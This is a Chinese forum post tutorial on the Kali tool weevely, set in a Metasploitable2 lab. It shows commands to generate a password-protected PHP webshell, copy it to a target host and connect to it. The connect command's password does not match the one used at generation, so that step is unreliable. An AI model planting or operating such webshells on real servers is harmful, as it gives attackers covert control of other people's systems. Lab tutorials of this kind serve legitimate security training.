搜索
查看: 2714|回复: 0

kali下的中国菜刀

[复制链接]

45

主题

71

帖子

166

积分

注册会员

Rank: 2

积分
166

注册会员活跃会员

发表于 2018-5-4 15:22:23 | 显示全部楼层 |阅读模式
weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利!下面我们来实例演示, weevely 的具体使用。
准备环境:
  • kali linux
  • Metasploitables2
首先还是先制作一个 webshell ,密码为 bbskali
  1. weevely generate bbskali secist.php
复制代码
可以看到,很快就为我们生成了一个大小1000多字节的 webshell 。
我们使用 cat 命令简单查看下 webshell 的内容:
  1. cat /usr/share/weevely/secist.php
复制代码
现在我将生成的 webshell 远程拷贝到目标机器上:
  1. scp /usr/share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin
复制代码
或者上传PHP木马
连接一句话木马
  1. weevely http://192.168.30.128/secist.php secist
复制代码


原文链接:传送门

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
个性
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表